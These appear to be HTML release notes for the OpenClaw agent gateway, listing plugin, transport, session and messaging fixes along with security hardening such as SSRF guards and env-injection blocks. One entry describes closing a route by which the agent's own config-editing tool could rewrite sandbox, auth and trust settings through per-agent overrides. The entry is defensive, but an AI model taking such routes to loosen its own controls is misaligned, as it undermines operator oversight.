<li>Plugins/tasks: add a detached runtime registration contract so plugin executors can own detached task lifecycle and cancellation without reaching into core task internals. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4290560041" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68915" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68915/hovercard" href="https://github.com/openclaw/openclaw/pull/68915">#68915</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>.</li>
<li>Terminal/logging: optimize <code>sanitizeForLog()</code> by replacing the iterative control-character stripping loop with a single regex pass while preserving the existing ANSI-first sanitization behavior. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4269298617" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67205" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67205/hovercard" href="https://github.com/openclaw/openclaw/pull/67205">#67205</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bulutmuf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bulutmuf">@bulutmuf</a>.</li>
<li>QA/CI: make <code>openclaw qa suite</code> and <code>openclaw qa telegram</code> fail by default when scenarios fail, add <code>--allow-failures</code> for artifact-only runs, and tighten live-lane defaults for CI automation. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4292375229" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69122" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69122/hovercard" href="https://github.com/openclaw/openclaw/pull/69122">#69122</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Mattermost: stream thinking, tool activity, and partial reply text into a single draft preview post that finalizes in place when safe. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4079961255" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47838" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/47838/hovercard" href="https://github.com/openclaw/openclaw/pull/47838">#47838</a>) thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ninjaa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ninjaa">@ninjaa</a>.</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Exec/YOLO: stop rejecting gateway-host exec in <code>security=full</code> plus <code>ask=off</code> mode via the Python/Node script preflight hardening path, so promptless YOLO exec once again runs direct interpreter stdin and heredoc forms such as <code>node &lt;&lt;'NODE' ... NODE</code>.</li>
<li>OpenAI Codex: normalize legacy <code>openai-completions</code> transport overrides on default OpenAI/Codex and GitHub Copilot-compatible hosts back to the native Codex Responses transport while leaving custom proxies untouched. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4072230033" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45304" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/45304/hovercard" href="https://github.com/openclaw/openclaw/pull/45304">#45304</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4051911911" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42194" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/42194/hovercard" href="https://github.com/openclaw/openclaw/pull/42194">#42194</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dyss1992/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dyss1992">@dyss1992</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DeadlySilent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DeadlySilent">@DeadlySilent</a>.</li>
<li>Anthropic/plugins: scope Anthropic <code>api: "anthropic-messages"</code> defaulting to Anthropic-owned providers, so <code>openai-codex</code> and other providers without an explicit <code>api</code> no longer get rewritten to the wrong transport. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4242180427" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64534" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64534/hovercard" href="https://github.com/openclaw/openclaw/issues/64534">#64534</a>.</li>
<li>fix(qqbot): add SSRF guard to direct-upload URL paths in uploadC2CMedia and uploadGroupMedia [AI-assisted]. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4300293964" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69595" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69595/hovercard" href="https://github.com/openclaw/openclaw/pull/69595">#69595</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>fix(gateway): enforce allowRequestSessionKey gate on template-rendered mapping sessionKeys. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4296975595" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69381" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69381/hovercard" href="https://github.com/openclaw/openclaw/pull/69381">#69381</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>Browser/Chrome MCP: surface <code>DevToolsActivePort</code> attach failures as browser-connectivity errors instead of a generic "waiting for tabs" timeout, and point signed-out fallbacks toward the managed <code>openclaw</code> profile.</li>
<li>Webchat/images: treat inline image attachments as media for empty-turn gating while still ignoring metadata-only blank turns. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4298879679" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69474" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69474/hovercard" href="https://github.com/openclaw/openclaw/pull/69474">#69474</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jaswir/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jaswir">@Jaswir</a>.</li>
<li>Discord/think: only show <code>adaptive</code> in <code>/think</code> autocomplete for provider/model pairs that actually support provider-managed adaptive thinking, so GPT/OpenAI models no longer advertise an Anthropic-only option.</li>
<li>Thinking: only expose <code>max</code> for models that explicitly support provider max reasoning, and remap stored <code>max</code> settings to the largest supported thinking mode when users switch to another model.</li>
<li>Gateway/usage: bound the cost usage cache with FIFO eviction so date/range lookups cannot grow unbounded. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4290122995" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68842" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68842/hovercard" href="https://github.com/openclaw/openclaw/pull/68842">#68842</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Feelw00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Feelw00">@Feelw00</a>.</li>
<li>OpenAI/Responses: resolve <code>/think</code> levels against each GPT model's supported reasoning efforts so <code>/think off</code> no longer becomes high reasoning or sends unsupported <code>reasoning.effort: "none"</code> payloads.</li>
<li>Lobster/TaskFlow: allow managed approval resumes to use <code>approvalId</code> without a resume token, and persist that id in approval wait state. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4300014752" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69559" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69559/hovercard" href="https://github.com/openclaw/openclaw/pull/69559">#69559</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kirkluokun/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kirkluokun">@kirkluokun</a>.</li>
<li>Plugins/startup: install bundled runtime dependencies into each plugin's own runtime directory, reuse source-checkout repair caches after rebuilds, and log only packages that were actually installed so repeated Gateway starts stay quiet once deps are present.</li>
<li>Plugins/startup: ignore pnpm's <code>npm_execpath</code> when repairing bundled plugin runtime dependencies and skip workspace-only package specs so npm-only install flags or local workspace links do not break packaged plugin startup.</li>
<li>MCP: block interpreter-startup env keys such as <code>NODE_OPTIONS</code> for stdio servers while preserving ordinary credential and proxy env vars. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4299858919" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69540" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69540/hovercard" href="https://github.com/openclaw/openclaw/pull/69540">#69540</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
<li>Agents/shell: ignore non-interactive placeholder shells like <code>/usr/bin/false</code> and <code>/sbin/nologin</code>, falling back to <code>sh</code> so service-user exec runs no longer exit immediately. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4295241548" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69308" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69308/hovercard" href="https://github.com/openclaw/openclaw/pull/69308">#69308</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sk7n4k3d/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sk7n4k3d">@sk7n4k3d</a>.</li>
<li>Setup/TUI: relaunch the setup hatch TUI in a fresh process while preserving the configured gateway target and auth source, so onboarding recovers terminal state cleanly without exposing gateway secrets on command-line args. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4299687411" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69524" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69524/hovercard" href="https://github.com/openclaw/openclaw/pull/69524">#69524</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Codex: avoid re-exposing the image-generation tool on native vision turns with inbound images, and keep bare image-model overrides on the configured image provider. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4246074486" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65061" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65061/hovercard" href="https://github.com/openclaw/openclaw/pull/65061">#65061</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhulijin1991/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhulijin1991">@zhulijin1991</a>.</li>
<li>Sessions/reset: clear auto-sourced model, provider, and auth-profile overrides on <code>/new</code> and <code>/reset</code> while preserving explicit user selections, so channel sessions stop staying pinned to runtime fallback choices. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4297673043" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69419" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69419/hovercard" href="https://github.com/openclaw/openclaw/pull/69419">#69419</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sk7n4k3d/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sk7n4k3d">@sk7n4k3d</a>.</li>
<li>Sessions/costs: snapshot <code>estimatedCostUsd</code> like token counters so repeated persist paths no longer compound the same run cost by up to dozens of times. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4297467955" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69403" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69403/hovercard" href="https://github.com/openclaw/openclaw/pull/69403">#69403</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MrMiaigi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MrMiaigi">@MrMiaigi</a>.</li>
<li>OpenAI Codex: route ChatGPT/Codex OAuth Responses requests through the <code>/backend-api/codex</code> endpoint so <code>openai-codex/gpt-5.4</code> no longer hits the removed <code>/backend-api/responses</code> alias. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4295870982" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69336" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69336/hovercard" href="https://github.com/openclaw/openclaw/pull/69336">#69336</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mzogithub/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mzogithub">@mzogithub</a>.</li>
<li>OpenAI/Responses: omit disabled reasoning payloads when <code>/think off</code> is active, so GPT reasoning models no longer receive unsupported <code>reasoning.effort: "none"</code> requests. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4212610595" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61982" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61982/hovercard" href="https://github.com/openclaw/openclaw/pull/61982">#61982</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/a-tokyo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/a-tokyo">@a-tokyo</a>.</li>
<li>Gateway/pairing: treat loopback shared-secret node-host, TUI, and gateway clients as local for pairing decisions, so trusted local tools no longer reconnect as remote clients and fail with <code>pairing required</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4297898125" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69431" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69431/hovercard" href="https://github.com/openclaw/openclaw/pull/69431">#69431</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SARAMALI15792/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SARAMALI15792">@SARAMALI15792</a>.</li>
<li>Active Memory: degrade gracefully when memory recall fails during prompt building, logging a warning and letting the reply continue without memory context instead of failing the whole turn. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4299181298" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69485" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69485/hovercard" href="https://github.com/openclaw/openclaw/pull/69485">#69485</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Magicray1217/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Magicray1217">@Magicray1217</a>.</li>
<li>Ollama: add provider-policy defaults for <code>baseUrl</code> and <code>models</code> so implicit local discovery can run before config validation rejects a minimal Ollama provider config. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4296784483" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69370" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69370/hovercard" href="https://github.com/openclaw/openclaw/pull/69370">#69370</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PratikRai0101/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PratikRai0101">@PratikRai0101</a>.</li>
<li>Agents/model selection: clear transient auto-failover session overrides before each turn so recovered primary models are retried immediately without emitting user-override reset warnings. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4296542538" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69365" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69365/hovercard" href="https://github.com/openclaw/openclaw/pull/69365">#69365</a>) Thanks @hitesh-github99.</li>
<li>Auto-reply: apply silent <code>NO_REPLY</code> policy per conversation type, so direct chats get a helpful rewritten reply while groups and internal deliveries can remain quiet. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4288588954" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68644" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68644/hovercard" href="https://github.com/openclaw/openclaw/pull/68644">#68644</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Takhoffman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Takhoffman">@Takhoffman</a>.</li>
<li>Telegram/status reactions: honor <code>messages.removeAckAfterReply</code> when lifecycle status reactions are enabled, clearing or restoring the reaction after success/error using the configured hold timings. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4281815006" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68067" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68067/hovercard" href="https://github.com/openclaw/openclaw/pull/68067">#68067</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/poiskgit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/poiskgit">@poiskgit</a>.</li>
<li>Web search/plugins: resolve plugin-scoped SecretRef API keys for bundled Exa, Firecrawl, Gemini, Kimi, Perplexity, Tavily, and Grok web-search providers when they are selected through the shared web-search config. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4286936148" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68424" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68424/hovercard" href="https://github.com/openclaw/openclaw/pull/68424">#68424</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/afurm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/afurm">@afurm</a>.</li>
<li>Telegram/polling: raise the default polling watchdog threshold from 90s to 120s and add configurable <code>channels.telegram.pollingStallThresholdMs</code> (also per-account) so long-running Telegram work gets more room before polling is treated as stalled. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4171105612" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57737" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/57737/hovercard" href="https://github.com/openclaw/openclaw/pull/57737">#57737</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Vitalcheffe/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Vitalcheffe">@Vitalcheffe</a>.</li>
<li>Telegram/polling: bound the persisted-offset confirmation <code>getUpdates</code> probe with a client-side timeout so a zombie socket cannot hang polling recovery before the runner watchdog starts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4100697326" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50368" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/50368/hovercard" href="https://github.com/openclaw/openclaw/pull/50368">#50368</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/boticlaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/boticlaw">@boticlaw</a>.</li>
<li>Agents/Pi runner: retry silent <code>stopReason=error</code> turns with no output when no side effects ran, so non-frontier providers that briefly return empty error turns get another chance instead of ending the session early. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4285719244" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68310" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68310/hovercard" href="https://github.com/openclaw/openclaw/pull/68310">#68310</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Chased1k/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Chased1k">@Chased1k</a>.</li>
<li>Plugins/memory: preserve the active memory capability when read-only snapshot plugin loads run, so status and provider discovery paths no longer wipe memory public artifacts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293432275" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69219" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69219/hovercard" href="https://github.com/openclaw/openclaw/pull/69219">#69219</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zeroaltitude/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zeroaltitude">@zeroaltitude</a>.</li>
<li>Plugins: keep only the highest-precedence manifest when distinct discovered plugins share an id, so lower-precedence global or workspace duplicates no longer load beside bundled or config-selected plugins. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4048942451" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41626" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/41626/hovercard" href="https://github.com/openclaw/openclaw/pull/41626">#41626</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Tortes/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Tortes">@Tortes</a>.</li>
<li>fix(security): block MINIMAX_API_HOST workspace env injection and remove env-driven URL routing [AI-assisted]. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4270399571" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67300" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67300/hovercard" href="https://github.com/openclaw/openclaw/pull/67300">#67300</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>Cron/delivery: treat explicit <code>delivery.mode: "none"</code> runs as not requested even if the runner reports <code>delivered: false</code>, so no-delivery cron jobs no longer persist false delivery failures or errors. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4294708685" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69285" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69285/hovercard" href="https://github.com/openclaw/openclaw/pull/69285">#69285</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/matsuri1987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/matsuri1987">@matsuri1987</a>.</li>
<li>Plugins/install: repair active and default-enabled bundled plugin runtime dependencies before import in packaged installs, so bundled Discord, WhatsApp, Slack, Telegram, and provider plugins work without putting their dependency trees in core.</li>
<li>BlueBubbles: raise the outbound <code>/api/v1/message/text</code> send timeout default from 10s to 30s, and add a configurable <code>channels.bluebubbles.sendTimeoutMs</code> (also per-account) so macOS 26 setups where Private API iMessage sends stall for 60+ seconds no longer silently lose messages at the 10s abort. Probes, chat lookups, and health checks keep the shorter 10s default. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4272911942" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67486" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67486/hovercard" href="https://github.com/openclaw/openclaw/issues/67486">#67486</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293104018" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69193" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69193/hovercard" href="https://github.com/openclaw/openclaw/pull/69193">#69193</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/omarshahine/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/omarshahine">@omarshahine</a>.</li>
<li>Agents/bootstrap: budget truncation markers against per-file caps, preserve source content instead of silently wasting bootstrap bytes, and avoid marker-only output in tiny-budget truncation cases. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4292276705" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69114" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69114/hovercard" href="https://github.com/openclaw/openclaw/pull/69114">#69114</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BKF-Gitty/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BKF-Gitty">@BKF-Gitty</a>.</li>
<li>Context engine/plugins: stop rejecting third-party context engines whose <code>info.id</code> differs from the registered plugin slot id. The strict-match contract added in 2026.4.14 broke <code>lossless-claw</code> and other plugins whose internal engine id does not equal the slot id they are registered under, producing repeated <code>info.id must match registered id</code> lane failures on every turn. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4262699518" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66601" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66601/hovercard" href="https://github.com/openclaw/openclaw/issues/66601">#66601</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4263541400" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66678" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66678/hovercard" href="https://github.com/openclaw/openclaw/pull/66678">#66678</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/GodsBoy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/GodsBoy">@GodsBoy</a>.</li>
<li>Agents/compaction: rename embedded Pi compaction lifecycle events to <code>compaction_start</code> / <code>compaction_end</code> so OpenClaw stays aligned with <code>pi-coding-agent</code> 0.66.1 event naming. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4276557549" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67713" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67713/hovercard" href="https://github.com/openclaw/openclaw/pull/67713">#67713</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mpz4life/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mpz4life">@mpz4life</a>.</li>
<li>Security/dotenv: block all <code>OPENCLAW_*</code> keys from untrusted workspace <code>.env</code> files so workspace-local env loading fails closed for new runtime-control variables instead of silently inheriting them. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3792286847" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/473" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/473/hovercard" href="https://github.com/openclaw/openclaw/pull/473">#473</a>)</li>
<li>Gateway/device pairing: restrict non-admin paired-device sessions (device-token auth) to their own pairing list, approve, and reject actions so a paired device cannot enumerate other devices or approve/reject pairing requests authored by another device. Admin and shared-secret operator sessions retain full visibility. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4296863737" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69375" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69375/hovercard" href="https://github.com/openclaw/openclaw/pull/69375">#69375</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eleqtrizit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eleqtrizit">@eleqtrizit</a>.</li>
<li>Agents/gateway tool: extend the agent-facing <code>gateway</code> tool's config mutation guard so model-driven <code>config.patch</code> and <code>config.apply</code> cannot rewrite operator-trusted paths (sandbox, plugin trust, gateway auth/TLS, hook routing and tokens, SSRF policy, MCP servers, workspace filesystem hardening) and cannot bypass the guard by editing per-agent sandbox, tools, or embedded-Pi overrides in place under <code>agents.list[]</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4296871568" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69377" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69377/hovercard" href="https://github.com/openclaw/openclaw/pull/69377">#69377</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eleqtrizit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eleqtrizit">@eleqtrizit</a>.</li>
